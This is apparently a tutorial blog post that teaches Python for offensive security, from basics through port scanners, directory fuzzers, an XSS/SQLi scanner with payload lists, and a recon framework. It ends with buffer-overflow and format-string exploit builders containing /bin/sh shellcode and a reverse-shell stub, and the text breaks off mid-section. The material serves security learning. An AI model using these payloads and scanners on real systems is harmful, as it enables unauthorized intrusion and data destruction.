Python for Hackers: From Zero to Exploit Developer
Master Python the hacker way. From basic syntax to advanced exploitation techniques, networking, and automation. This is the complete roadmap to Python mastery for security professionals.
“Python isn’t just a language — it’s the hacker’s Swiss Army knife. Master it, and you master the art of automation.”
Phase 0 — The Python Hacker Mindset
Think in Scripts, Not Commands Every repetitive task should become a Python script.
Prototype Fast, Optimize Later Get it working, then make it beautiful. Speed beats perfection.
Read Code Like Exploits Study how others solve problems. Libraries are learning goldmines.
Automate Everything If you do it twice, script it. If you script it, share it.
Python is about thinking in solutions, not syntax.
Phase 1 — Core Python Foundations
1. Essential Syntax & Data Types
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
# Variables and basic types
target_ip = "192.168.1.1"
port_list = [22, 80, 443, 8080]
scan_results = {}
is_vulnerable = True
# Strings (critical for payload crafting)
payload = f"'; DROP TABLE users; --"
encoded_payload = payload.encode('utf-8')
hex_payload = payload.encode().hex()
# Lists and dictionaries (your data containers)
vulnerabilities = ["SQLi", "XSS", "RCE"]
target_info = {
"ip": "10.10.10.1",
"os": "Linux",
"services": [22, 80, 443]
}
2. Control Flow for Security Logic
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
# Conditional logic for vulnerability checks
def check_service(port, banner):
if "SSH-2.0" in banner and "OpenSSH_7.4" in banner:
return "Potentially vulnerable to CVE-2018-15473"
elif port == 21 and "220" in banner:
return "FTP service detected"
else:
return "Unknown service"
# Loops for enumeration
def port_scan(target, ports):
open_ports = []
for port in ports:
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(1)
result = sock.connect_ex((target, port))
if result == 0:
open_ports.append(port)
sock.close()
except Exception as e:
continue
return open_ports
Practice with real scenarios. Every concept should solve a security problem.
Phase 2 — Functions & Error Handling
1. Building Reusable Security Functions
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
import socket
import requests
from urllib.parse import quote
def banner_grab(ip, port, timeout=3):
"""Grab service banner for fingerprinting"""
try:
sock = socket.socket()
sock.settimeout(timeout)
sock.connect((ip, port))
banner = sock.recv(1024).decode().strip()
sock.close()
return banner
except Exception as e:
return f"Error: {e}"
def sql_injection_test(url, param, payload):
"""Test for SQL injection vulnerabilities"""
try:
malicious_url = f"{url}?{param}={quote(payload)}"
response = requests.get(malicious_url, timeout=5)
# Check for common SQL error patterns
sql_errors = ['sql syntax', 'mysql_fetch', 'ora-', 'postgresql']
for error in sql_errors:
if error in response.text.lower():
return {"vulnerable": True, "error": error}
return {"vulnerable": False}
except Exception as e:
return {"error": str(e)}
2. Exception Handling for Robust Tools
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
def safe_request(url, headers=None, timeout=10):
"""Make HTTP requests with proper error handling"""
try:
response = requests.get(url, headers=headers, timeout=timeout)
return {
"status_code": response.status_code,
"headers": dict(response.headers),
"content": response.text,
"success": True
}
except requests.exceptions.Timeout:
return {"error": "Request timeout", "success": False}
except requests.exceptions.ConnectionError:
return {"error": "Connection failed", "success": False}
except Exception as e:
return {"error": str(e), "success": False}
Error handling isn’t optional in security tools — it’s what separates amateurs from professionals.
Phase 3 — File Operations & Data Parsing
1. Reading Wordlists and Payloads
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
def load_wordlist(filename):
"""Load wordlist efficiently"""
try:
with open(filename, 'r', encoding='utf-8', errors='ignore') as f:
return [line.strip() for line in f if line.strip()]
except FileNotFoundError:
print(f"Wordlist {filename} not found")
return []
def load_payloads(payload_file):
"""Load XSS/SQLi payloads from file"""
payloads = {}
current_category = None
with open(payload_file, 'r') as f:
for line in f:
line = line.strip()
if line.startswith('#'):
current_category = line[1:].strip()
payloads[current_category] = []
elif line and current_category:
payloads[current_category].append(line)
return payloads
2. Parsing Logs and Output
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
import re
from datetime import datetime
def parse_nmap_output(nmap_file):
"""Extract open ports from nmap output"""
open_ports = []
with open(nmap_file, 'r') as f:
content = f.read()
# Regex to find open ports
port_pattern = r'(\d+)/tcp\s+open\s+(\w+)'
matches = re.findall(port_pattern, content)
for port, service in matches:
open_ports.append({
"port": int(port),
"service": service,
"protocol": "tcp"
})
return open_ports
def parse_access_logs(log_file):
"""Parse Apache/Nginx access logs for suspicious activity"""
suspicious_patterns = [
r'\.\./', # Directory traversal
r'<script', # XSS attempts
r'union.*select', # SQL injection
r'cmd=', # Command injection
]
alerts = []
with open(log_file, 'r') as f:
for line_num, line in enumerate(f, 1):
for pattern in suspicious_patterns:
if re.search(pattern, line, re.IGNORECASE):
alerts.append({
"line": line_num,
"pattern": pattern,
"content": line.strip()
})
return alerts
Master file I/O early. Most security tools are just smart file processors.
Phase 4 — Networking & Socket Programming
1. TCP/UDP Socket Programming
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
import socket
import threading
class PortScanner:
def __init__(self, target, threads=100):
self.target = target
self.threads = threads
self.open_ports = []
self.lock = threading.Lock()
def scan_port(self, port):
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(1)
result = sock.connect_ex((self.target, port))
if result == 0:
banner = self.grab_banner(sock)
with self.lock:
self.open_ports.append({
"port": port,
"banner": banner
})
sock.close()
except:
pass
def grab_banner(self, sock):
try:
sock.send(b"GET / HTTP/1.1\r\nHost: target\r\n\r\n")
banner = sock.recv(1024).decode().strip()
return banner[:100] # Limit banner length
except:
return ""
def scan_range(self, start_port, end_port):
threads = []
for port in range(start_port, end_port + 1):
t = threading.Thread(target=self.scan_port, args=(port,))
threads.append(t)
t.start()
# Limit concurrent threads
if len(threads) >= self.threads:
for thread in threads:
thread.join()
threads = []
# Wait for remaining threads
for thread in threads:
thread.join()
return self.open_ports
2. HTTP Requests and Web Scraping
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
import requests
from bs4 import BeautifulSoup
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
class WebScanner:
def __init__(self, target_url):
self.target = target_url
self.session = requests.Session()
self.session.verify = False # Ignore SSL warnings
def directory_brute(self, wordlist):
"""Brute force directories"""
found_dirs = []
for directory in wordlist:
url = f"{self.target.rstrip('/')}/{directory}"
try:
response = self.session.get(url, timeout=5)
if response.status_code not in [404, 403]:
found_dirs.append({
"path": directory,
"status": response.status_code,
"size": len(response.content)
})
print(f"[{response.status_code}] {url}")
except:
continue
return found_dirs
def extract_forms(self, url):
"""Extract all forms for testing"""
try:
response = self.session.get(url)
soup = BeautifulSoup(response.text, 'html.parser')
forms = []
for form in soup.find_all('form'):
form_data = {
'action': form.get('action', ''),
'method': form.get('method', 'GET').upper(),
'inputs': []
}
for input_tag in form.find_all(['input', 'textarea', 'select']):
form_data['inputs'].append({
'name': input_tag.get('name', ''),
'type': input_tag.get('type', 'text'),
'value': input_tag.get('value', '')
})
forms.append(form_data)
return forms
except Exception as e:
return []
Networking is the foundation of all hacking. Master sockets, and you master remote exploitation.
Phase 5 — Advanced Python for Exploitation
1. Binary Exploitation Helpers
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
import struct
class ExploitHelper:
@staticmethod
def pack_address(addr, arch='x86'):
"""Pack memory address for exploitation"""
if arch == 'x86':
return struct.pack('<I', addr) # Little endian 32-bit
elif arch == 'x64':
return struct.pack('<Q', addr) # Little endian 64-bit
@staticmethod
def create_pattern(length):
"""Create De Bruijn pattern for offset finding"""
alphabet = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"
pattern = ""
for i in range(length):
pattern += alphabet[i % len(alphabet)]
return pattern
@staticmethod
def find_offset(pattern, crash_value):
"""Find offset in buffer overflow"""
try:
# Convert crash value to string if it's hex
if isinstance(crash_value, int):
crash_str = struct.pack('<I', crash_value).decode()
else:
crash_str = crash_value
offset = pattern.find(crash_str)
return offset if offset != -1 else None
except:
return None
def generate_shellcode(command, arch='x86'):
"""Generate basic shellcode (educational purposes)"""
if arch == 'x86':
# Basic Linux execve("/bin/sh") shellcode
shellcode = (
b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
b"\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
)
return shellcode
2. Cryptography and Encoding
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
import base64
import hashlib
from Crypto.Cipher import AES
from Crypto.Random import get_random_bytes
class CryptoHelper:
@staticmethod
def hash_password(password, salt=None):
"""Hash password with salt"""
if salt is None:
salt = get_random_bytes(16)
key = hashlib.pbkdf2_hmac('sha256',
password.encode('utf-8'),
salt,
100000)
return base64.b64encode(salt + key).decode()
@staticmethod
def simple_xor(data, key):
"""XOR encryption/decryption"""
key_bytes = key.encode() if isinstance(key, str) else key
data_bytes = data.encode() if isinstance(data, str) else data
result = bytearray()
for i in range(len(data_bytes)):
result.append(data_bytes[i] ^ key_bytes[i % len(key_bytes)])
return bytes(result)
@staticmethod
def rot13(text):
"""ROT13 encoding"""
result = ""
for char in text:
if 'a' <= char <= 'z':
result += chr((ord(char) - ord('a') + 13) % 26 + ord('a'))
elif 'A' <= char <= 'Z':
result += chr((ord(char) - ord('A') + 13) % 26 + ord('A'))
else:
result += char
return result
Phase 6 — Web Application Testing
1. Automated Vulnerability Scanner
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
import requests
import re
from urllib.parse import urljoin, urlparse
class WebVulnScanner:
def __init__(self, target_url):
self.target = target_url
self.session = requests.Session()
self.vulnerabilities = []
# Common payloads
self.xss_payloads = [
"<script>alert('XSS')</script>",
"javascript:alert('XSS')",
"<img src=x onerror=alert('XSS')>",
"';alert('XSS');//"
]
self.sql_payloads = [
"' OR '1'='1",
"' UNION SELECT NULL--",
"'; DROP TABLE users--",
"1' AND SLEEP(5)--"
]
def test_xss(self, forms):
"""Test for XSS vulnerabilities"""
for form in forms:
for payload in self.xss_payloads:
try:
data = {}
for input_field in form['inputs']:
if input_field['type'] in ['text', 'search', 'email']:
data[input_field['name']] = payload
else:
data[input_field['name']] = input_field['value']
url = urljoin(self.target, form['action'])
if form['method'] == 'POST':
response = self.session.post(url, data=data)
else:
response = self.session.get(url, params=data)
if payload in response.text:
self.vulnerabilities.append({
'type': 'XSS',
'url': url,
'payload': payload,
'method': form['method']
})
except Exception as e:
continue
def test_sql_injection(self, forms):
"""Test for SQL injection"""
for form in forms:
for payload in self.sql_payloads:
try:
data = {}
for input_field in form['inputs']:
if input_field['type'] in ['text', 'password', 'search']:
data[input_field['name']] = payload
else:
data[input_field['name']] = input_field['value']
url = urljoin(self.target, form['action'])
if form['method'] == 'POST':
response = self.session.post(url, data=data)
else:
response = self.session.get(url, params=data)
# Check for SQL error patterns
sql_errors = [
'sql syntax', 'mysql', 'ora-', 'postgresql',
'sqlite', 'mssql', 'odbc', 'jdbc'
]
for error in sql_errors:
if error in response.text.lower():
self.vulnerabilities.append({
'type': 'SQL_INJECTION',
'url': url,
'payload': payload,
'error': error
})
break
except Exception as e:
continue
def generate_report(self):
"""Generate vulnerability report"""
if not self.vulnerabilities:
return "No vulnerabilities found."
report = f"Vulnerability Report for {self.target}\n"
report += "=" * 50 + "\n\n"
for vuln in self.vulnerabilities:
report += f"[{vuln['type']}] {vuln['url']}\n"
report += f"Payload: {vuln['payload']}\n"
if 'error' in vuln:
report += f"SQL Error: {vuln['error']}\n"
report += "-" * 30 + "\n"
return report
Phase 7 — Automation & Frameworks
1. Building a Recon Framework
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
#!/usr/bin/env python3
import argparse
import json
import threading
from concurrent.futures import ThreadPoolExecutor
import subprocess
import requests
class ReconFramework:
def __init__(self, target_domain):
self.target = target_domain
self.results = {
'subdomains': [],
'open_ports': [],
'technologies': [],
'directories': [],
'vulnerabilities': []
}
def subdomain_enum(self):
"""Enumerate subdomains"""
print(f"[+] Enumerating subdomains for {self.target}")
# Using subfinder (if installed)
try:
result = subprocess.run(['subfinder', '-d', self.target, '-silent'],
capture_output=True, text=True, timeout=300)
subdomains = result.stdout.strip().split('\n')
self.results['subdomains'] = [s for s in subdomains if s]
except:
print("[-] Subfinder not found, using manual method")
self.results['subdomains'] = [f"www.{self.target}", f"mail.{self.target}"]
def port_scan_all(self):
"""Port scan all discovered subdomains"""
print("[+] Scanning ports on discovered hosts")
def scan_host(subdomain):
scanner = PortScanner(subdomain, threads=50)
ports = scanner.scan_range(1, 1000)
return {subdomain: ports}
with ThreadPoolExecutor(max_workers=10) as executor:
futures = [executor.submit(scan_host, sub) for sub in self.results['subdomains']]
for future in futures:
result = future.result()
self.results['open_ports'].append(result)
def technology_detection(self):
"""Detect web technologies"""
print("[+] Detecting web technologies")
for subdomain in self.results['subdomains']:
try:
url = f"http://{subdomain}"
response = requests.get(url, timeout=5)
# Check headers for technology indicators
tech_indicators = {
'server': response.headers.get('Server', ''),
'x-powered-by': response.headers.get('X-Powered-By', ''),
'set-cookie': response.headers.get('Set-Cookie', '')
}
self.results['technologies'].append({
subdomain: tech_indicators
})
except:
continue
def run_full_recon(self):
"""Run complete reconnaissance"""
print(f"[+] Starting full recon on {self.target}")
self.subdomain_enum()
self.port_scan_all()
self.technology_detection()
return self.results
def save_results(self, filename):
"""Save results to JSON file"""
with open(filename, 'w') as f:
json.dump(self.results, f, indent=2)
print(f"[+] Results saved to {filename}")
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Automated Reconnaissance Framework")
parser.add_argument("target", help="Target domain")
parser.add_argument("-o", "--output", help="Output file", default="recon_results.json")
args = parser.parse_args()
recon = ReconFramework(args.target)
results = recon.run_full_recon()
recon.save_results(args.output)
Phase 8 — Essential Libraries for Hackers
Security-Focused Libraries
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
# Network and HTTP
import socket
import requests
import urllib3
from scapy.all import *
# Web scraping and parsing
from bs4 import BeautifulSoup
import lxml
import selenium
# Cryptography
from Crypto.Cipher import AES, DES
from Crypto.Random import get_random_bytes
import hashlib
import base64
# System and process
import subprocess
import os
import sys
import threading
import multiprocessing
# Data manipulation
import json
import csv
import xml.etree.ElementTree as ET
import re
# Database connectivity
import sqlite3
import pymongo
Quick Setup Script
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
#!/usr/bin/env python3
"""
Hacker's Python Environment Setup
Install essential libraries for security research
"""
import subprocess
import sys
def install_package(package):
"""Install package using pip"""
try:
subprocess.check_call([sys.executable, "-m", "pip", "install", package])
print(f"✅ {package} installed successfully")
except subprocess.CalledProcessError:
print(f"❌ Failed to install {package}")
def main():
essential_packages = [
"requests",
"beautifulsoup4",
"scapy",
"pycryptodome",
"paramiko",
"selenium",
"python-nmap",
"colorama",
"tqdm"
]
print("🔧 Setting up Python hacker environment...")
print("Installing essential packages:")
for package in essential_packages:
install_package(package)
print("\n🎉 Setup complete! Ready to hack with Python.")
if __name__ == "__main__":
main()
Don’t install everything at once. Learn each library by building something with it.
Phase 9 — Real-World Projects
Project 1: Multi-threaded Port Scanner
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
#!/usr/bin/env python3
"""
Advanced Port Scanner with Banner Grabbing
Usage: python3 scanner.py -t target -p 1-1000 -T 100
"""
import argparse
import socket
import threading
import time
from queue import Queue
class AdvancedPortScanner:
def __init__(self, target, port_range, threads=100, timeout=1):
self.target = target
self.port_range = port_range
self.threads = threads
self.timeout = timeout
self.open_ports = []
self.queue = Queue()
self.lock = threading.Lock()
def parse_port_range(self, port_range):
"""Parse port range (e.g., '1-1000' or '80,443,8080')"""
ports = []
for part in port_range.split(','):
if '-' in part:
start, end = map(int, part.split('-'))
ports.extend(range(start, end + 1))
else:
ports.append(int(part))
return ports
def scan_port(self):
"""Worker thread function"""
while True:
port = self.queue.get()
if port is None:
break
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(self.timeout)
result = sock.connect_ex((self.target, port))
if result == 0:
banner = self.grab_banner(sock, port)
with self.lock:
self.open_ports.append({
'port': port,
'banner': banner,
'service': self.identify_service(port, banner)
})
print(f"[+] {port}/tcp open - {banner[:50]}")
sock.close()
except Exception as e:
pass
finally:
self.queue.task_done()
def grab_banner(self, sock, port):
"""Grab service banner"""
try:
if port == 80:
sock.send(b"GET / HTTP/1.1\r\nHost: " + self.target.encode() + b"\r\n\r\n")
elif port == 21:
pass # FTP sends banner automatically
elif port == 22:
pass # SSH sends banner automatically
elif port == 25:
pass # SMTP sends banner automatically
banner = sock.recv(1024).decode('utf-8', errors='ignore').strip()
return banner
except:
return "Unknown"
def identify_service(self, port, banner):
"""Identify service based on port and banner"""
common_services = {
21: "FTP", 22: "SSH", 23: "Telnet", 25: "SMTP",
53: "DNS", 80: "HTTP", 110: "POP3", 143: "IMAP",
443: "HTTPS", 993: "IMAPS", 995: "POP3S"
}
if port in common_services:
return common_services[port]
# Banner-based detection
if "HTTP" in banner.upper():
return "HTTP"
elif "SSH" in banner.upper():
return "SSH"
elif "FTP" in banner.upper():
return "FTP"
else:
return "Unknown"
def run_scan(self):
"""Run the port scan"""
ports = self.parse_port_range(self.port_range)
print(f"[+] Scanning {self.target} ({len(ports)} ports)")
print(f"[+] Using {self.threads} threads with {self.timeout}s timeout")
# Start worker threads
threads = []
for _ in range(self.threads):
t = threading.Thread(target=self.scan_port)
t.start()
threads.append(t)
# Add ports to queue
start_time = time.time()
for port in ports:
self.queue.put(port)
# Wait for completion
self.queue.join()
# Stop worker threads
for _ in range(self.threads):
self.queue.put(None)
for t in threads:
t.join()
scan_time = time.time() - start_time
# Print results
print(f"\n[+] Scan completed in {scan_time:.2f} seconds")
print(f"[+] Found {len(self.open_ports)} open ports:")
for port_info in sorted(self.open_ports, key=lambda x: x['port']):
print(f" {port_info['port']}/tcp - {port_info['service']}")
return self.open_ports
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Advanced Port Scanner")
parser.add_argument("-t", "--target", required=True, help="Target IP or hostname")
parser.add_argument("-p", "--ports", default="1-1000", help="Port range (e.g., 1-1000 or 80,443)")
parser.add_argument("-T", "--threads", type=int, default=100, help="Number of threads")
parser.add_argument("--timeout", type=float, default=1.0, help="Socket timeout")
args = parser.parse_args()
scanner = AdvancedPortScanner(args.target, args.ports, args.threads, args.timeout)
results = scanner.run_scan()
Project 2: Web Directory Fuzzer
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
#!/usr/bin/env python3
"""
Web Directory Fuzzer with Custom Wordlists
Usage: python3 dirfuzz.py -u http://example.com -w wordlist.txt
"""
import requests
import threading
import argparse
import time
from queue import Queue
from urllib.parse import urljoin
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
class DirectoryFuzzer:
def __init__(self, base_url, wordlist_file, threads=50, timeout=5):
self.base_url = base_url.rstrip('/')
self.wordlist_file = wordlist_file
self.threads = threads
self.timeout = timeout
self.queue = Queue()
self.results = []
self.lock = threading.Lock()
self.session = requests.Session()
self.session.verify = False
# Custom headers to avoid detection
self.session.headers.update({
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'
})
def load_wordlist(self):
"""Load wordlist from file"""
try:
with open(self.wordlist_file, 'r', encoding='utf-8', errors='ignore') as f:
return [line.strip() for line in f if line.strip() and not line.startswith('#')]
except FileNotFoundError:
print(f"[-] Wordlist file '{self.wordlist_file}' not found")
return []
def fuzz_directory(self):
"""Worker thread for directory fuzzing"""
while True:
path = self.queue.get()
if path is None:
break
url = f"{self.base_url}/{path}"
try:
response = self.session.get(url, timeout=self.timeout)
# Filter interesting responses
if response.status_code not in [404]:
with self.lock:
result = {
'url': url,
'status': response.status_code,
'size': len(response.content),
'redirect': response.url if response.url != url else None
}
self.results.append(result)
# Color coding for different status codes
color = self.get_color_for_status(response.status_code)
print(f"{color}[{response.status_code}] {url} ({len(response.content)} bytes)")
except requests.exceptions.RequestException:
pass
finally:
self.queue.task_done()
def get_color_for_status(self, status_code):
"""Get color for status code"""
colors = {
200: '\033[92m', # Green
301: '\033[93m', # Yellow
302: '\033[93m', # Yellow
403: '\033[91m', # Red
500: '\033[95m', # Purple
}
return colors.get(status_code, '\033[0m') # Default
def run_fuzzing(self):
"""Run directory fuzzing"""
wordlist = self.load_wordlist()
if not wordlist:
return []
print(f"[+] Fuzzing {self.base_url}")
print(f"[+] Wordlist: {self.wordlist_file} ({len(wordlist)} entries)")
print(f"[+] Threads: {self.threads}")
print("-" * 50)
# Start worker threads
threads = []
for _ in range(self.threads):
t = threading.Thread(target=self.fuzz_directory)
t.start()
threads.append(t)
# Add paths to queue
start_time = time.time()
for path in wordlist:
self.queue.put(path)
# Wait for completion
self.queue.join()
# Stop worker threads
for _ in range(self.threads):
self.queue.put(None)
for t in threads:
t.join()
elapsed = time.time() - start_time
print(f"\n[+] Fuzzing completed in {elapsed:.2f} seconds")
print(f"[+] Found {len(self.results)} interesting paths")
return self.results
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Web Directory Fuzzer")
parser.add_argument("-u", "--url", required=True, help="Target URL")
parser.add_argument("-w", "--wordlist", required=True, help="Wordlist file")
parser.add_argument("-t", "--threads", type=int, default=50, help="Number of threads")
parser.add_argument("--timeout", type=float, default=5, help="Request timeout")
args = parser.parse_args()
fuzzer = DirectoryFuzzer(args.url, args.wordlist, args.threads, args.timeout)
results = fuzzer.run_fuzzing()
Phase 10 — Python for Exploit Development
1. Buffer Overflow Exploitation
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
#!/usr/bin/env python3
"""
Buffer Overflow Exploit Development Helper
Generates patterns, calculates offsets, builds payloads
"""
import struct
import socket
import sys
class BufferOverflowExploit:
def __init__(self, target_ip, target_port):
self.target_ip = target_ip
self.target_port = target_port
self.pattern_create_len = 1000
def create_pattern(self, length):
"""Create cyclic pattern for offset discovery"""
pattern = ""
chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"
for i in range(length):
pattern += chars[i % len(chars)]
return pattern.encode()
def find_offset(self, pattern, crash_address):
"""Find offset where EIP is overwritten"""
try:
# Convert address to little-endian bytes
if isinstance(crash_address, str):
# Handle hex string
crash_bytes = bytes.fromhex(crash_address.replace('0x', ''))
else:
crash_bytes = struct.pack('<I', crash_address)
pattern_str = pattern.decode()
crash_str = crash_bytes.decode('utf-8', errors='ignore')
offset = pattern_str.find(crash_str)
return offset if offset != -1 else None
except Exception as e:
print(f"Error finding offset: {e}")
return None
def generate_bad_chars(self):
"""Generate bad character detection string"""
bad_chars = b""
for i in range(1, 256): # Skip null byte
bad_chars += struct.pack('B', i)
return bad_chars
def build_payload(self, offset, eip_address, shellcode, nop_sled=100):
"""Build complete exploit payload"""
# NOP sled
nops = b"\x90" * nop_sled
# Buffer padding
buffer = b"A" * offset
# EIP overwrite
eip = struct.pack('<I', eip_address)
# Payload structure: [BUFFER][EIP][NOPS][SHELLCODE]
payload = buffer + eip + nops + shellcode
return payload
def send_payload(self, payload):
"""Send payload to target"""
try:
print(f"[+] Sending payload to {self.target_ip}:{self.target_port}")
print(f"[+] Payload size: {len(payload)} bytes")
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((self.target_ip, self.target_port))
sock.send(payload)
sock.close()
print("[+] Payload sent successfully")
except Exception as e:
print(f"[-] Error sending payload: {e}")
# Example shellcode (Linux x86 execve /bin/sh)
LINUX_SHELLCODE = (
b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3"
b"\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
)
# Windows reverse shell shellcode (example)
def generate_windows_reverse_shell(ip, port):
"""Generate Windows reverse shell shellcode"""
# This is a simplified example - use msfvenom for real exploits
shellcode_template = (
# This would contain actual shellcode bytes
# Use: msfvenom -p windows/shell_reverse_tcp LHOST=IP LPORT=PORT -f python
b"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00" # Example bytes
)
return shellcode_template
if __name__ == "__main__":
if len(sys.argv) < 3:
print("Usage: python3 bof_exploit.py <target_ip> <target_port>")
sys.exit(1)
target_ip = sys.argv[1]
target_port = int(sys.argv[2])
exploit = BufferOverflowExploit(target_ip, target_port)
# Step 1: Generate pattern for fuzzing
pattern = exploit.create_pattern(1000)
print(f"[+] Generated pattern: {pattern[:50]}...")
# Step 2: After crash, find offset (example)
# offset = exploit.find_offset(pattern, 0x41414141) # AAAA in hex
# Step 3: Build and send exploit
# payload = exploit.build_payload(offset=146, eip_address=0x625011af, shellcode=LINUX_SHELLCODE)
# exploit.send_payload(payload)
2. Format String Exploitation
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
#!/usr/bin/env python3
"""
Format String Vulnerability Exploitation
Demonstrates various format string attacks
"""
import struct
import socket
class FormatStringExploit:
def __init__(self):
self.target_function_address = None
self.shellcode_address = None
def leak_stack(self, offset_start=1, offset_end=10):
"""Generate format string to leak stack values"""
leak_payload = ""
for i in range(offset_start, offset_end + 1):
leak_payload += f"%{i}$x."
return leak_payload.encode()
def write_address(self, target_addr, value, offset):
"""Write arbitrary value to arbitrary address"""
# Convert addresses to bytes
addr_bytes = struct.pack('<I', target_addr)
# Calculate the value to write
# Format: [ADDRESS][%Nc%n] where N is calculated value
padding = value - 4 # Subtract 4 for the address itself
if padding <= 0:
padding = 1
payload = addr_bytes + f"%{padding}c%{offset}$n".encode()
return payload
def overwrite_got_entry(self, got_address, shellcode_addr, offset):
"""Overwrite GOT entry to redirect execution"""
# Split the shellcode address into two 16-bit writes for precision
low_bytes = shellcode_addr & 0xFFFF
high_bytes = (shellcode_addr >> 16) & 0xFFFF
# Build payload with two address overwrites
payload = b""
payload += struct.pack('<I', got_address) # Low bytes target
payload += struct.pack('<I', got_address + 2) # High bytes target
# Calculate padding for first write
if low_bytes > 8:
padding1 = low_bytes - 8
else:
padding1 = low_bytes + 0x10000 - 8
# Calculate padding for second write
if high_bytes > low_bytes:
padding2 = high_bytes - low_bytes
else:
padding2 = high_bytes + 0x10000 - low_bytes
payload += f"%{padding1}c%{offset}$hn".encode()
payload += f"%{padding2}c%{offset+1}$hn".encode()
return payload
def demonstrate_attacks(self):
"""Demonstrate common format string attacks"""
print("[+] Format String Exploitation Examples")
print("-" * 50)
# 1. Stack leak
leak_payload = self.leak_stack(1, 20)
print(f"Stack Leak Payload: {leak_payload}")
